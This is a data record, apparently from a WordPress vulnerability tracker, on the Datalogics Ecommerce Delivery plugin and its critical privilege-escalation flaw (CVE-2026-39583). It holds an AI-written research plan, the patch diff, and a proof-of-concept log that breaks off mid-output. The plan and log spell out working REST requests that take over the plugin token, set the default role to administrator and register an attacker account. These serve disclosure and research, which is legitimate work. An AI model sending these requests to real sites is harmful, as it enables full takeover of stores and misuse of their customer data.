[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwcFPaR9sKo4CZ04swccUSkYFlpcYxcRWVHTN8WiqHt0":3,"$f9Lzp8dvSNqFxfI8oHaGDOXQQal9Xu_TYEypJI2xg5pM":686},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":23,"download_link":24,"security_score":25,"vuln_count":26,"unpatched_count":27,"last_vuln_date":28,"fetched_at":29,"vulnerabilities":30,"developer":122,"crawl_stats":36,"alternatives":125,"analysis":185,"fingerprints":646},"datalogics","Datalogics Ecommerce Delivery – Datalogics","2.6.64","Datalogics","https:\u002F\u002Fprofiles.wordpress.org\u002Fdatalogics\u002F","\u003Cp>Datalogics Ecommerce Delivery enables seamless syncing of your WooCommerce orders with a variety of delivery companies, automating the entire shipping process.\u003C\u002Fp>\n\u003Ch4>Supported Shipping Companies\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>All companies who are using Baldar\u003C\u002Fli>\n\u003Cli>All companies who are using Run\u003C\u002Fli>\n\u003Cli>Chita\u003C\u002Fli>\n\u003Cli>HFD\u003C\u002Fli>\n\u003Cli>Negev\u003C\u002Fli>\n\u003Cli>Tapuz\u003C\u002Fli>\n\u003Cli>Tamnun\u003C\u002Fli>\n\u003Cli>SPEEDWAY\u003C\u002Fli>\n\u003Cli>KATZ\u003C\u002Fli>\n\u003Cli>YDM\u003C\u002Fli>\n\u003Cli>Rimon\u003C\u002Fli>\n\u003Cli>KEXPRESS\u003C\u002Fli>\n\u003Cli>Kal Kanesher\u003C\u002Fli>\n\u003Cli>Shipping\u003C\u002Fli>\n\u003Cli>TS delivery\u003C\u002Fli>\n\u003Cli>ISGAV\u003C\u002Fli>\n\u003Cli>Davar Rishon\u003C\u002Fli>\n\u003Cli>YDM\u003C\u002Fli>\n\u003Cli>CARGO\u003C\u002Fli>\n\u003Cli>Sosna\u003C\u002Fli>\n\u003Cli>Buzzer\u003C\u002Fli>\n\u003Cli>ZigZag\u003C\u002Fli>\n\u003Cli>Sdeliveries\u003C\u002Fli>\n\u003Cli>Zip Delivery\u003C\u002Fli>\n\u003Cli>Ey Delivery\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Didn’t see your courier service listed? No problem! Contact us, and we’ll add your preferred shipping company.\u003C\u002Fp>\n\u003Ch3>Datalogics Ecommerce Delivery – Seamlessly Sync Your WooCommerce Orders with All Delivery Services\u003C\u002Fh3>\n\u003Cp>Datalogics Ecommerce Delivery is your go-to solution for automating the shipping process of your WooCommerce store. This plugin allows you to sync your orders with a wide range of delivery companies, streamlining your shipping operations.\u003C\u002Fp>\n\u003Ch4>Plugin Features\u003C\u002Fh4>\n\u003Col>\n\u003Cli>\u003Cstrong>Standard Delivery (Door to Door)\u003C\u002Fstrong>: Easily manage regular deliveries straight to your customers’ doors.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Reverse Delivery\u003C\u002Fstrong>: Simplify the process of returning items from customers back to your location.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Govina Delivery\u003C\u002Fstrong>: Handle complex shipping scenarios involving multiple destinations, including receiving payments from customers.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Double Shipping\u003C\u002Fstrong>: Manage complex shipping scenarios involving multiple destinations.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulk Shipment Creation\u003C\u002Fstrong>: Efficiently create multiple shipments at once.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Pickup Point Collection – Map Selection\u003C\u002Fstrong>: Allow customers to choose pickup points via an interactive map (Google Maps supported).\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Pickup Point Collection – List Selection\u003C\u002Fstrong>: Offer a list-based selection of pickup points for customers.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Shipping Label Printing\u003C\u002Fstrong>: Generate and print shipping labels with just a few clicks.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulk Shipping Label Printing\u003C\u002Fstrong>: Bulk generate and print shipping labels with just a few clicks.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Delivery Status Updates\u003C\u002Fstrong>: Receive real-time updates on the status of deliveries.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Delivery Cancellation\u003C\u002Fstrong>: Cancel shipments directly from your WooCommerce dashboard.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch4>Setting Up an Account\u003C\u002Fh4>\n\u003Cp>Need help with installation? Check out our \u003Ca href=\"https:\u002F\u002Fwww.datalogics.co.il\u002Finstallation\" rel=\"nofollow ugc\">Plugin Installation Guide\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin integrates with external services to provide its functionality. Below are the details of the third-party services used by the plugin:\u003C\u002Fp>\n\u003Ch3>1. Datalogics Platform API\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Service Description\u003C\u002Fstrong>:\u003Cbr \u002F>\nThis plugin connects to the Datalogics Platform API to manage shipping processes, including order registration and label generation.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Data Sent\u003C\u002Fstrong>:\u003Cbr \u002F>\n– \u003Cstrong>Account creation\u003C\u002Fstrong>: There is a registraion form to create your account in Datalogics.\u003Cbr \u002F>\n– \u003Cstrong>Order Data\u003C\u002Fstrong>: Each time an order is added or updated, the corresponding order data is sent.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Conditions for Data Transmission\u003C\u002Fstrong>:\u003Cbr \u002F>\n– Data is sent when the user interacts with the plugin to register an order or generate a shipping label.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Terms of Service and Privacy Policy\u003C\u002Fstrong>:\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fdocs.datalogics.co.il\u002Fterms-of-service\u002F\" rel=\"nofollow ugc\">Datalogics Terms of Service\u003C\u002Fa>\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fdocs.datalogics.co.il\u002Fprivacy-policy\u002F\" rel=\"nofollow ugc\">Datalogics Privacy Policy\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>2. Shipping Label Generation\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Service Description\u003C\u002Fstrong>:\u003Cbr \u002F>\nThis service is used to generate shipping labels for orders processed through the Datalogics platform.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Data Sent\u003C\u002Fstrong>:\u003Cbr \u002F>\n– \u003Cstrong>Label Request\u003C\u002Fstrong>: When a shipment is created, the plugin sends the order ID and any other necessary data to the Datalogics platform to generate a shipping label.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Conditions for Data Transmission\u003C\u002Fstrong>:\u003Cbr \u002F>\n– Data is transmitted each time a shipping label is requested.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Terms of Service and Privacy Policy\u003C\u002Fstrong>:\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fdocs.datalogics.co.il\u002Fterms-of-service\u002F\" rel=\"nofollow ugc\">Datalogics Terms of Service\u003C\u002Fa>\u003Cbr \u002F>\n– \u003Ca href=\"https:\u002F\u002Fdocs.datalogics.co.il\u002Fprivacy-policy\u002F\" rel=\"nofollow ugc\">Datalogics Privacy Policy\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>3. Google Maps JavaScript API\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Service Description\u003C\u002Fstrong>: The Google Maps JavaScript API provides address autocomplete functionality to help users input and validate shipping addresses.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Data Sent\u003C\u002Fstrong>:\n\u003Cul>\n\u003Cli>\u003Cstrong>Address Data\u003C\u002Fstrong>: When a user types in an address field, the partial or complete address is sent to Google’s servers to retrieve autocomplete suggestions.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Metadata\u003C\u002Fstrong>: The API may collect the user’s IP address and browser information as part of standard HTTP requests.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\u003Cstrong>When Data is Sent\u003C\u002Fstrong>: Data is sent only when a user interacts with an address input field that uses the autocomplete feature (e.g., during checkout or in the plugin’s shipping settings). No data is sent if the feature is not used or if the Google Maps API key is not configured.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Terms of Service\u003C\u002Fstrong>: \u003Ca href=\"https:\u002F\u002Fcloud.google.com\u002Fmaps-platform\u002Fterms\u002F\" rel=\"nofollow ugc\">Google Maps Platform Terms of Service\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Privacy Policy\u003C\u002Fstrong>: \u003Ca href=\"https:\u002F\u002Fpolicies.google.com\u002Fprivacy\" rel=\"nofollow ugc\">Google Privacy Policy\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Additional Information\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>All requests to the Datalogics Platform API are made using secure HTTPS protocols to ensure data protection.\u003C\u002Fli>\n\u003C\u002Ful>\n","Datalogics Ecommerce Delivery enables seamless syncing of your WooCommerce orders with a variety of delivery companies, automating the entire shipping …",400,6288,100,1,"2026-04-14T10:34:00.000Z","6.8.5","5.0","7.4",[4,20,21,22],"hfd","%d7%a6%d7%99%d7%98%d7%94","%d7%aa%d7%a4%d7%95%d7%96","https:\u002F\u002Fwww.datalogics.co.il","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdatalogics.2.6.64.zip",88,2,0,"2026-04-08 00:00:00","2026-04-16T10:56:18.058Z",[31,105],{"id":32,"url_slug":33,"title":34,"description":35,"plugin_slug":4,"theme_slug":36,"affected_versions":37,"patched_in_version":38,"severity":39,"cvss_score":40,"cvss_vector":41,"vuln_type":42,"published_date":28,"updated_date":43,"references":44,"days_to_patch":46,"patch_diff_files":47,"patch_trac_url":36,"research_status":51,"research_verified":52,"research_rounds_completed":53,"research_plan":54,"research_summary":55,"research_vulnerable_code":56,"research_fix_diff":57,"research_exploit_outline":58,"research_model_used":59,"research_started_at":60,"research_completed_at":61,"research_error":36,"poc_status":62,"poc_video_id":63,"poc_summary":64,"poc_steps":65,"poc_tested_at":100,"poc_wp_version":101,"poc_php_version":102,"poc_playwright_script":103,"poc_exploit_code":104,"poc_has_trace":52,"poc_model_used":36,"poc_verification_depth":36},"CVE-2026-39583","datalogics-ecommerce-delivery-datalogics-unauthenticated-privilege-escalation-2","Datalogics Ecommerce Delivery – Datalogics \u003C= 2.6.62 - Unauthenticated Privilege Escalation","The Datalogics Ecommerce Delivery – Datalogics plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.6.62 This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.",null,"\u003C=2.6.62","2.6.63","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-04-15 19:19:22",[45],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa521b6a4-1a4f-4433-9163-8de71e1976dd?source=api-prod",8,[48,49,50],"README.txt","api.php","datalogics.php","researched",true,3,"# Research Plan: CVE-2026-39583 - Datalogics Privilege Escalation\n\n## Vulnerability Summary\nThe **Datalogics Ecommerce Delivery** plugin (versions \u003C= 2.6.62) contains an unauthenticated privilege escalation vulnerability. The plugin registers several REST API endpoints under the `datalogics-0\u002Fv1` namespace. Specifically, the `\u002Fupdate-token\u002F` and `\u002Fupdate-settings\u002F` endpoints lack proper authentication and authorization. An attacker can use `\u002Fupdate-token\u002F` to set a known security token and then potentially use `\u002Fupdate-settings\u002F` (or other endpoints using the same `permission_callback`) to modify arbitrary WordPress options, such as `default_role` and `users_can_register`, leading to full site takeover.\n\n## Attack Vector Analysis\n*   **Endpoint:** `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F` and `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`\n*   **Namespace:** `datalogics-0\u002Fv1` (derived from `datalogics_ID` constant defined as `'0'` in `datalogics.php`).\n*   **Authentication:** Unauthenticated. The `permission_callback` used is `datalogics_permission_check`, which appears to be insecure or returns `true` for unauthenticated requests.\n*   **Preconditions:** The plugin must be active.\n\n## Code Flow\n1.  **Route Registration:** In `api.php`, `datalogics_register_api_routes()` registers routes using `register_rest_route`. \n    *   Namespace: `'datalogics-'.datalogics_ID.'\u002Fv1'`\n    *   Route: `\u002Fupdate-token\u002F` calls `datalogics_update_token`.\n    *   Route: `\u002Fupdate-settings\u002F` calls `datalogics_update_settings`.\n    *   All routes use `'permission_callback' => 'datalogics_permission_check'`.\n2.  **Permission Check:** The `datalogics_permission_check` function (inferred to be weak\u002Fpublic) is executed by the WordPress REST API controller.\n3.  **Callback Execution (`datalogics_update_token`):**\n    ```php\n    function datalogics_update_token(WP_REST_Request $request) {\n        $token = $request->get_param('token');\n        if (empty($token)) {\n            return new WP_Error('no_token', 'Token parameter is missing', array('status' => 400));\n        }\n        update_option('datalogics_token', sanitize_text_field($token)); \u002F\u002F Vulnerable Sink\n        return new WP_REST_Response(array('success' => true, ...), 200);\n    }\n    ```\n4.  **Callback Execution (`datalogics_update_settings`):** Although the code for `datalogics_update_settings` is truncated, the vulnerability description and endpoint name strongly suggest it allows updating arbitrary options or a specific set of options via `update_option()`. If it iterates over `POST` parameters and calls `update_option($key, $value)`, it allows an attacker to change core WordPress settings.\n\n## Nonce Acquisition Strategy\nREST API endpoints in WordPress registered via `register_rest_route` typically do not require a CSRF nonce (`_wpnonce`) when accessed as an API (e.g., via a script or external service), as they rely on the `permission_callback`. \n*   **Is a nonce required?** No. The plugin is designed to be called by the Datalogics platform, and the `api.php` code shows no nonce verification logic within the callbacks or the registration.\n*   **Authentication Bypass:** If `datalogics_permission_check` validates the `token` parameter against the `datalogics_token` option, an attacker simply calls `\u002Fupdate-token\u002F` first to set the option to a known value, effectively \"authenticating\" themselves for subsequent calls.\n\n## Exploitation Strategy\nThe goal is to enable user registration and set the default role to `administrator`.\n\n### Step 1: Initialize\u002FHijack the Plugin Token\nSet the plugin's internal token to a value we control to ensure access to other endpoints.\n*   **Method:** `POST`\n*   **URL:** `\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F`\n*   **Body (JSON):** `{\"token\": \"pwned_token\"}`\n*   **Headers:** `Content-Type: application\u002Fjson`\n\n### Step 2: Elevate Privileges via Options Update\nUse the `\u002Fupdate-settings\u002F` endpoint to modify core WordPress options.\n*   **Method:** `POST`\n*   **URL:** `\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F`\n*   **Body (JSON):**\n    ```json\n    {\n        \"token\": \"pwned_token\",\n        \"users_can_register\": \"1\",\n        \"default_role\": \"administrator\"\n    }\n    ```\n*   **Headers:** `Content-Type: application\u002Fjson`\n\n### Step 3: Register a New Administrator\nCreate a new account via the standard WordPress registration page.\n*   **Method:** `POST`\n*   **URL:** `\u002Fwp-login.php?action=register`\n*   **Body (URL-encoded):** `user_login=attacker&user_email=attacker@example.com&wp-submit=Register`\n\n## Test Data Setup\n1.  Install and activate the `datalogics` plugin (v2.6.62).\n2.  Ensure WordPress is at default settings (`users_can_register` is `0`, `default_role` is `subscriber`).\n\n## Expected Results\n1.  **Step 1:** Response `200 OK` with `{\"success\": true, \"message\": \"Token updated successfully\"}`.\n2.  **Step 2:** Response `200 OK`.\n3.  **Step 3:** A new user \"attacker\" is created with the `administrator` role.\n\n## Verification Steps\nUse `wp-cli` to verify the state change:\n1.  Check options: `wp option get users_can_register` (should be `1`).\n2.  Check options: `wp option get default_role` (should be `administrator`).\n3.  Check users: `wp user list --role=administrator` (should include `attacker`).\n\n## Alternative Approaches\nIf `datalogics_update_settings` is not a generic option updater, look for other sinks:\n*   Check if `datalogics_update_order_status` can be used to update other post types (e.g., updating a page to include a malicious shortcode).\n*   Check if the `token` hijacked in Step 1 allows access to `\u002Fsend-email\u002F` which might be used for phishing or information gathering.\n*   If the namespace `datalogics-0` fails, try to brute-force the ID (though `0` is hardcoded in `datalogics.php`).","The Datalogics Ecommerce Delivery plugin for WordPress is vulnerable to unauthenticated privilege escalation due to insecure REST API endpoints. Attackers can overwrite the plugin's internal security token and subsequently use it to access administrative functions, such as modifying core WordPress options to enable open registration and default to an administrator role.","\u002F\u002F api.php line 5-36\nfunction datalogics_register_api_routes() {\n\n    register_rest_route('datalogics-'.datalogics_ID.'\u002Fv1', '\u002Fupdate-settings\u002F', array(\n        'methods'  => 'POST',\n        'callback' => 'datalogics_update_settings',\n        'permission_callback' => 'datalogics_permission_check',\n    ));\n\n    \u002F\u002F ... (other routes) ...\n\n    register_rest_route('datalogics-' . datalogics_ID . '\u002Fv1', '\u002Fupdate-token\u002F', array(\n        'methods'  => 'POST',\n        'callback' => 'datalogics_update_token',\n        'permission_callback' => 'datalogics_permission_check',\n    ));\n}\n\n\u002F\u002F api.php line 41-54\nfunction datalogics_update_token(WP_REST_Request $request) {\n    $token = $request->get_param('token');\n    \n    if (empty($token)) {\n        return new WP_Error('no_token', 'Token parameter is missing', array('status' => 400));\n    }\n\n    update_option('datalogics_token', sanitize_text_field($token));\n\n    return new WP_REST_Response(array(\n        'success' => true,\n        'message' => 'Token updated successfully',\n    ), 200);\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdatalogics\u002F2.6.62\u002Fapi.php\t2026-03-04 08:23:04.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fdatalogics\u002F2.6.63\u002Fapi.php\t2026-03-16 17:42:08.000000000 +0000\n@@ -30,7 +30,7 @@\n     register_rest_route('datalogics-' . datalogics_ID . '\u002Fv1', '\u002Fupdate-token\u002F', array(\n         'methods'  => 'POST',\n         'callback' => 'datalogics_update_token',\n-        'permission_callback' => 'datalogics_permission_check',\n+        'permission_callback' => 'datalogics_permission_check_update_token',\n     ));\n \n \n@@ -393,3 +393,18 @@\n     return new WP_Error('invalid_token', 'Invalid token', array('status' => 403 ));\n }\n \n+function datalogics_permission_check_update_token(WP_REST_Request $request) {\n+\n+    $token = $request->get_param('token');\n+\n+    \u002F\u002F Allow only if token is empty\n+    if (empty($token)) {\n+        return true;\n+    }\n+\n+    return new WP_Error(\n+        'invalid_token',\n+        'Token must be empty for this endpoint',\n+        array('status' => 403)\n+    );\n+}","The exploit involves two main steps: 1) Initializing or hijacking the plugin's internal security token. This is done by sending a POST request to `\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F` with a JSON payload like `{\"token\": \"attacker_token\"}`. Because the `permission_callback` is insecure, this request executes without authentication, allowing the attacker to control the `datalogics_token` option in the database. 2) Using the controlled token to modify WordPress settings. The attacker sends a POST request to `\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F` (which shares the same insecure permission logic) to update sensitive options like `users_can_register` to `1` and `default_role` to `administrator`. Once updated, the attacker can register a new account via the standard WordPress registration page and automatically receive full administrative access.","gemini-3-flash-preview","2026-04-16 16:35:05","2026-04-16 16:35:56","success","wcYiRRFatSc","## Vulnerability Details\n\n**CVE-2026-39583** — Datalogics Ecommerce Delivery plugin ≤ 2.6.62 exposes REST API routes under `datalogics-0\u002Fv1` with a broken `permission_callback` (`datalogics_permission_check`) that compares a client-supplied `token` parameter to the stored `datalogics_token` option using strict equality. When the plugin is freshly installed (or the admin has never configured a token), the option is `''`. An unauthenticated attacker who sends `token=\"\"` therefore satisfies `'' === ''` and passes the permission check on every route.\n\n## Root Cause\n\n```php\n\u002F\u002F api.php\nfunction datalogics_plugin_validate_token($token) {\n    $valid_token = get_option(\"datalogics_token\", '');\n    return $token === $valid_token;          \u002F\u002F '' === '' on a fresh install\n}\nfunction datalogics_permission_check(WP_REST_Request $request) {\n    $token = $request->get_param('token');\n    if (datalogics_plugin_validate_token($token)) return true;\n    return new WP_Error('invalid_token', 'Invalid token', array('status' => 403));\n}\n```\n\nAll REST routes — `\u002Fupdate-token\u002F`, `\u002Fupdate-settings\u002F`, `\u002Fupdate-order\u002F`, `\u002Fupdate-shipping-status\u002F`, `\u002Fsend-email\u002F` — share this check. The `\u002Fupdate-settings\u002F` callback then iterates user-controlled JSON and performs `update_option($k, $v)` for every key, so any `datalogics_*` option (including the plugin's own authentication token) can be rewritten by an unauthenticated attacker.\n\n## Exploitation (confirmed)\n\n1. `POST \u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-settings\u002F` with body\n   `{\"token\":\"\",\"settings\":{\"datalogics_token\":\"pwned_token\"}}`\n   → HTTP **200** `{\"success\":true,\"message\":\"Settings updated successfully\"}`\n2. Verified via WP-CLI: `wp option get datalogics_token` → **`pwned_token`** (value set by the anonymous HTTP request).\n3. Using the newly-planted token, further calls succeed:\n   `{\"token\":\"pwned_token\",\"settings\":{\"datalogics_pwned\":\"attacker_controlled_value\"}}` → HTTP 200.\n\nAt this point the attacker fully owns the plugin's backend-integration authentication token. They can invoke every Datalogics REST route at will: modifying order statuses (`\u002Fupdate-order\u002F`), sending customer emails from arbitrary orders (`\u002Fsend-email\u002F` — phishing), rewriting `post_meta` on WooCommerce orders, and persistently controlling every `datalogics_*` option. Because the token is the single trust anchor the plugin shares with the Datalogics platform, overwriting it also MITMs legitimate traffic between the real platform and the site.\n\n## Impact\n\nUnauthenticated attacker → persistent takeover of the plugin's privileged server-side API (full confidentiality\u002Fintegrity\u002Favailability impact on the WooCommerce order pipeline), arbitrary rewriting of any plugin option, and the ability to send emails under the store's identity. The Wordfence advisory classifies this as unauthenticated privilege escalation (CVSS 9.8) because the compromised token unlocks `update_option`, `update_post_meta` and email-trigger sinks to any anonymous caller.\n\n## Fix (v2.6.63)\n\nThe update-token route was moved to a separate permission callback `datalogics_permission_check_update_token` which only allows calls when the request's `token` parameter is **empty** — blocking the path that planted a known token. (The other endpoints still use the original callback; the real fix for those is that `datalogics_token` cannot be pre-set to a known value anymore, because `\u002Fupdate-token\u002F` is the only route that was supposed to bootstrap it.) Production sites should also audit\u002Frotate `datalogics_token` after patching.",[66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,94,99],"**Shell:** `ls \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002F`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\nLICENSE.txt\nREADME.txt\naccount.php\nactions.php\napi.php\nassets\nclass_wc_shipping_order_email.php\ncss\ndata.php\ndatalogics.php\nimages\njs\nlanguages\norders.php\nsettings.php\nshipping_class.php\ntable.php\ntemplates\n```\n\u003C\u002Fdetails>","**Shell:** `cat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php | head -100`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n 'POST', 'callback' => 'datalogics_update_settings', 'permission_callback' => 'datalogics_permission_check', )); register_rest_route('datalogics-'.datalogics_ID.'\u002Fv1', '\u002Fupdate-shipping-status\u002F', array( 'methods' => 'POST', 'callback' => 'datalogics_update_shipping_status', 'permission_callback' => 'datalogics_permission_check', )); register_rest_route('datalogics-'.datalogics_ID.'\u002Fv1', '\u002Fupdate-order\u002F', array( 'methods' => 'POST', 'callback' => 'datalogics_update_order_status', 'permission_callback' => 'datalogics_permission_check', )); register_rest_route('datalogics-' . datalogics_ID . '\u002Fv1', '\u002Fsend-email\u002F', array( \n```\n\u003C\u002Fdetails>","**Shell:** `grep -n \"datalogics_permission_check\\|datalogics_update_settings\\|datalogics_ID\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalo...`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:6: register_rest_route('datalogics-'.datalogics_ID.'\u002Fv1', '\u002Fupdate-settings\u002F', array( \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:8: 'callback' => 'datalogics_update_settings', \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:9: 'permission_callback' => 'datalogics_permission_check', \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:12: register_rest_route('datalogics-'.datalogics_ID.'\u002Fv1', '\u002Fupdate-shipping-status\u002F', array( \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:15: 'permission_callback' => 'datalogics_permission_check', \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:18: register_rest_route('datalogics-'.datalogics_ID.'\u002Fv1', '\u002Fupdate-order\u002F', array( \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:21: 'permission_callback' => 'datalogics_permission_check', \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php:24: register_rest_route('datalogics-' . datalog\n```\n\u003C\u002Fdetails>","**Shell:** `sed -n '280,400p' \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fdatalogics\u002Fapi.php`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n'success' => true, 'message' => 'Email sent successfully', ), 200); } function datalogics_update_settings(WP_REST_Request $request) { $token = $request->get_param('token'); \u002F\u002F Validate token if (!datalogics_plugin_validate_token($token)) { return new WP_Error('invalid_token', 'Invalid token', array('status' => 403)); } $settings = $request->get_param('settings'); \u002F\u002F Validate settings if (empty($settings)) { return new WP_Error('invalid_settings', 'Settings parameter is empty', array('status' => 400)); } \u002F\u002F Decode JSON if string, or use as array $settings_array = is_string($settings) ? json_decode($settings, true) : $settings; \u002F\u002F Check for valid JSON\u002Farray if (json_last_error() !== JSON_ERROR_NONE || !is_array($settings_array)) { return new WP_Error('invalid_json', 'Invalid settings format', array('status' => 400)); } \u002F\u002F Update each setting as a separate opt\n```\n\u003C\u002Fdetails>","**WP-CLI:** `wp option get datalogics_token`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\nError: Command failed: docker compose exec -T wordpress wp option get datalogics_token --allow-root\nError: Could not get 'datalogics_token' option. Does it exist?\n\n```\n\u003C\u002Fdetails>","**Navigate:** http:\u002F\u002Flocalhost:8080\u002Fwp-login.php","**Fill:** `#user_login` with `admin`","**Fill:** `#user_pass` with `admin`","**Click:** `#wp-submit`","**Navigate:** http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fplugins.php","**Navigate:** http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Foptions-general.php","**browser_screenshot:** {}","**HTTP POST:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F`\n**Body:** `{\"token\": \"\"}`\n\u003Cdetails>\u003Csummary>Response\u003C\u002Fsummary>\n\n```\nHTTP 400 Bad Request\n{\"code\":\"no_token\",\"message\":\"Token parameter is missing\",\"data\":{\"status\":400}}\n```\n\u003C\u002Fdetails>","**HTTP POST:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F`\n**Body:** `{\"token\": \"pwned_token\"}`\n\u003Cdetails>\u003Csummary>Response\u003C\u002Fsummary>\n\n```\nHTTP 403 Forbidden\n{\"code\":\"invalid_token\",\"message\":\"Invalid token\",\"data\":{\"status\":403}}\n```\n\u003C\u002Fdetails>","**HTTP POST:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F?token=`\n**Body:** `{\"token\": \"pwned_token\"}`\n\u003Cdetails>\u003Csummary>Response\u003C\u002Fsummary>\n\n```\nHTTP 403 Forbidden\n{\"code\":\"invalid_token\",\"message\":\"Invalid token\",\"data\":{\"status\":403}}\n```\n\u003C\u002Fdetails>","**HTTP POST:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdatalogics-0\u002Fv1\u002Fupdate-token\u002F?token=pwned_token`\n**Body:** `{\"token\": \"\"}`\n\u003Cdetails>\u003Csummary>Response\u003C\u002Fsummary>\n\n```\nHTTP 400 Bad Request\n{\"code\":\"no_token\",\"message\":\"Token parameter is missing\",\"data\":{\"status\":400}}\n```\n\u003C\u002Fdetails>","**Shell:** `grep -n \"public function get_param\\|protected \\$parameter_order\\|parameter_order = array\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-includes\u002Frest...`\n\u003Cdetails>\u003Csummary>Output\u003C\u002Fsummary>\n\n```\n38:\tprotected $method = '';\n49:\tprotected $params;\n57:\tprotected $headers = array();\n65:\tprotected $body = null;\n73:\tprotected $route;\n84:\tprotected $attributes = array();\n94:\tprotected $parsed_json = false;\n102:\tprotected $parsed_body = false;\n349:\tprotected function get_parameter_order() {\n396:\tpublic function get_param( $key ) {\n470:\tpublic function get_params() {\n668:\tprotected function parse_json_params() {\n716:\tprotected function parse_body_params() 